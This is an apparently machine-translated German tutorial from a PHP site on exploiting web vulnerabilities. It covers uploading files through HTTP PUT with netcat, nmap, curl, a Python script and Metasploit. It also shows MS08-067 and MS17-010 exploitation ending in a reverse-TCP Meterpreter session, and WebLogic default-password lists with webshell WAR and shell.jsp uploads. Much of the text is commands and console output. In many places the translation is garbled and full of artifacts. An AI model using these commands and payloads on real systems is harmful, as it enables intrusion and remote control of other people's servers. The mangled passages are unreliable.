Heim  >  Artikel  >  Betrieb und Instandhaltung  >  Beispielanalyse der Ausnutzung von Web-Schwachstellen

Beispielanalyse der Ausnutzung von Web-Schwachstellen

PHPz
PHPznach vorne
2023-05-27 08:55:271566Durchsuche

1. Verwendung der HTTP-PUT-Methode

PUT ist eine Methode zur Dateiverwaltung. Wenn das Betriebs- und Wartungspersonal die Standardkonfiguration des Webservers nicht geändert hat und diese Methoden weiterhin unterstützt, kann es Dateien auf den Server hochladen Dateisystem nach Belieben.

1.1. Netcat verwendet die PUT-Methode

Netcat ist ein sehr bekanntes Netzwerktool, das als „NC“ bezeichnet wird und im Penetrationstest als „Schweizer **“ bekannt ist. Es kann mehrere Funktionen wie Portüberwachung, Port-Scanning, Remote-Dateiübertragung und Remote-Shell implementieren.

Nachdem Sie die PUT-Methode zum Öffnen des Webdienstes überprüft und kennen, geben Sie den folgenden Befehl ein, um die Datei hochzuladen:

nc IP PORT

PUT /dav/hack.txt HTTP/1.1

Host: IP

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Drücken Sie zweimal die Eingabetaste. Sie können sehen, dass die Datei hacked.txt erfolgreich erstellt wurde, der Statuscode 201 ist und der Speicherort der Dateierstellung das Verzeichnis /dav/ ist.

1.2, Nmap verwendet die PUT-Methode

Befehl:

nmap -p port IP -script http-put-script-args http-put.url='/dav/test.php',http-put.file ='/root/test.php'

Befehlserklärung:

-script http-put //Wählen Sie das http-put-Skript aus. Das Skript unterstützt das Hochladen von Dateien mit der http-put-Methode. T -Script-rags // Setze die Skriptparameter 1, 2

http-put.url = '/dav/test.php' // Setze Parameter 1 auf den Upload-Zieldateipfad

http-put.file = ' /root/test.php' //Parameter 2 auf den lokalen Dateipfad zum Hochladen setzen.

Beispielanalyse der Ausnutzung von Web-Schwachstellen Auf dem Bild sehen Sie, dass der Upload über das Nmap-Skript erfolgreich war.

1.3 BurpSuite verwendet die PUT-Methode

Verwenden Sie die tägliche BurpSuite, um auf den Upload-Zielpfad zuzugreifen, das Datenpaket zu erfassen, die Datenpaket-Anforderungsmethode und den Upload-Pfad zu ändern, den Dateiinhalt in den Anforderungstext zu schreiben und das Paket an zu senden Der Webserver.

Beispielanalyse der Ausnutzung von Web-Schwachstellen Das Server-Antwortpaket zeigt, dass die Datei erfolgreich erstellt wurde.

Beispielanalyse der Ausnutzung von Web-Schwachstellen1.4 CURL verwendet die PUT-Methode

CURL ist ein Dateiübertragungstool, das URL-Syntax verwendet, um unter der Befehlszeile zu arbeiten. Es lädt Daten über die angegebene URL hoch oder herunter und zeigt die Daten an. Das c in Curl bedeutet Client und URL ist die URL.

Der Befehl zum Erstellen einer Datei über die PUT-Methode lautet wie folgt:

Befehl 1:

curl -i -XPUT -H „Content-Type: text/plain=utf-8“ -d „ Hack abgeschlossen“ http://192.168.40.4/dav/hack.php

Beispielanalyse der Ausnutzung von Web-SchwachstellenBefehlserklärung:

-i/--include //Protokoll-Header-Informationen bei der Ausgabe einbeziehen

-X/--request

Befehlserklärung:

-d @„Dateiname“ //Aus Dateiinhalt lesen

1.5 QuickPuT-Skript mit PUT-Methode

Beispielanalyse der Ausnutzung von Web-SchwachstellenMit QuickPut, einem Python-Befehlszeilentool, können wir die HTTP-PUT-Methode verwenden, um Dateien auf den Server hochzuladen.

Befehl hochladen:

python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Befehlserklärung:

python QuickPut.py < ; Ziel-URL>

1.6 Metasploit verwendet die PUT-Methode

Metasploits Hilfsmodul AUX/Scanner/http/http_put kann Datei-Upload- und Löschvorgänge realisieren.

Befehl:

Beispielanalyse der Ausnutzung von Web-SchwachstellenVerwenden Sie das http_put-Modul zum zusätzlichen Scannen des http-Dienstes.

Optionen anzeigen // Modulparameter anzeigen.

Set RHOSTS 192.168.40.4 // Ziel-IP festlegen der Zielpfad

Nutzlast festlegen php/meterpreter/reverse_tcp //Angriffsnutzlast festlegen

Dateinamen festlegen msf.php //Name der Upload-Datei festlegen

Beispielanalyse der Ausnutzung von Web-Schwachstellen#🎜🎜 #

set FILEDATA file://root/test.php //Legen Sie den Datenpfad für das Hochladen lokaler Dateien fest

exploit //Starten Sie den Angriff

#🎜 🎜## 🎜🎜#

Das Rückgabeergebnis zeigt, dass die Datei erfolgreich hochgeladen wurde. Beispielanalyse der Ausnutzung von Web-Schwachstellen

2.SMB-Schwachstellenausnutzung

Nach der Durchführung eines Port-Scans zur Informationserfassung haben wir festgestellt, dass auf dem Host die Ports 139 und 445 geöffnet sind und die Banner zeigt Microsoft Windows, dann wird es mit den SMB-Schwachstellen Port 139 und 445 in Verbindung gebracht. Die häufigsten sind ms17-010, ms08-067 usw.

Schwachstellenerkennung

Befehl:

namp --script=/ usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

Befehlserklärung:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067. nse // Nmapms08-067-Schwachstellen-Scan-Skript verwenden

-sT // TCP-Scan verwenden

Wenn das Ausgabeergebnis lautet:

smb-vuln - ms08-067:

VULNERABLE:

Microsoft Windows-System anfällig für Remotecodeausführung (MS08-067)

Status: VULNERABLE

# 🎜🎜#IDs: CVE:CVE-2008-4250

Der Serverdienst in Microsoft Windows 2000 SP4, XP SP2 und SP3, Server 2003 SP1 und SP2, Vista Gold und SP1, Server 2008 und 7 Pre – Beta ermöglicht Remote-Angreifern die Ausführung beliebigen Codes über eine manipulierte RPC-Anfrage, die den Überlauf während der Pfadkanonisierung auslöst 🎜#https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

# 🎜🎜#https://cve.mitre.org/cgi-bin/cvename.cgi ?name=CVE-2008-4250

weist darauf hin, dass die Schwachstelle ms08-067 vorhanden ist und ms17-010 vorhanden ist das gleiche wie oben.

Ausnutzung von Sicherheitslücken

Verwenden Sie das MSF-SMB-Angriffsmodul, um die Sicherheitslücken ms08-067 und ms17-010 auszunutzen. #? (ms08 _067_netapi) > Exploit

[*]Reverse-TCP-Handler am lokalen Überwachungs-IP-Port gestartet

Ziel-IP automatisch erkennen: 445

[*]Ziel-IP: 445 - Fingerabdruck: Windows 2000 - Service Pack 0 - 4 - lang:Englisch

[*]Ziel-IP:445- Ausgewähltes Ziel: Windows 2000 Universal

[*]Ziel-IP :445- Versuch, die Sicherheitslücke auszulösen...

[*]Sendephase (957487 Bytes) an Ziel-IP

[*]Meterpreter-Sitzung 2 geöffnet (IP-Port abhören). -> Zielport-Bounce)

meterpreter>

ms17-010 Exploit ist derselbe wie oben.

3.Ausnutzung von Weblogic-Schwachstellen

Bei Penetrationstests stoßen wir häufig auf den Weblogic Server-Anwendungsserver. Nachdem wir Weblogic Server gesehen haben, denken wir an Weblogic Der Server verfügt möglicherweise über schwache Passwörter für die Backend-Verwaltung, Schwachstellen bei der JAVA-Deserialisierung, Schwachstellen beim Hochladen willkürlicher Dateien und viele andere CVE-Schwachstellen in dieser Version. Lassen Sie uns teilen, wie Sie verschiedene Schwachstellen in Weblogic ausnutzen können. Nr 🎜#

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

Wenn es vorhanden ist, können Sie sich beim Verwaltungshintergrund des Anwendungsservers anmelden und das Webshellwar-Paket hochladen.

Stellen Sie nach dem Hochladen das Kriegspaket auf dem Anwendungsserver bereit.

#🎜🎜 ## 🎜🎜#

Beispielanalyse der Ausnutzung von Web-SchwachstellenNach dem erfolgreichen Hochladen und Bereitstellen des Kriegspakets können Sie Malaysia besuchen. Vul Nervosität #🎜 🎜#CVE-Schwachstellen können direkt mithilfe von Skripten erkannt werden und dann anhand des Schwachstellencodes Exp-Skript-Exploits gefunden werden.

Das Weblogic-Schwachstellenerkennungsskript ist sehr leistungsstark und kann verschiedene CVEs, Verwaltungshintergrundpfade, SSRF und schwache Passwörter erkennen und unterstützt spätere Erweiterungen.

Sie können auch Java-Deserialisierungs-Schwachstellen-Ausnutzungstools verwenden, um diese direkt zu erkennen und auszunutzen. Das Schwachstellen-Tool bietet Schwachstellenerkennung, Befehlsausführung, Datei-Upload und Stapelprüfungsfunktionen. #3.3 🎜#

Informationen durch Sprengen von Weblogic zurückgeben.

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Rufen Sie das Anmeldekennwort, den Dienstnamen und das Verzeichnis mit zufälligen Zeichen ab, erstellen Sie den POC und laden Sie ihn hoch, um die Testdatei hochzuladen.

Übergeben Sie die folgenden Daten unter dem Pfad /bea_wls_deployment_internal/DeploymentService

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Der Server gibt den Upload-Erfolg und den absoluten Pfad zurück der Datei.

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Der Inhalt der hochgeladenen Datei wird nach Zugriff auf diesen Upload-Dateipfad angezeigt

http://IP/bea_wls_deployment_internal /shell.jsp# 🎜🎜#

Beispielanalyse der Ausnutzung von Web-Schwachstellen

Das obige ist der detaillierte Inhalt vonBeispielanalyse der Ausnutzung von Web-Schwachstellen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:yisu.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen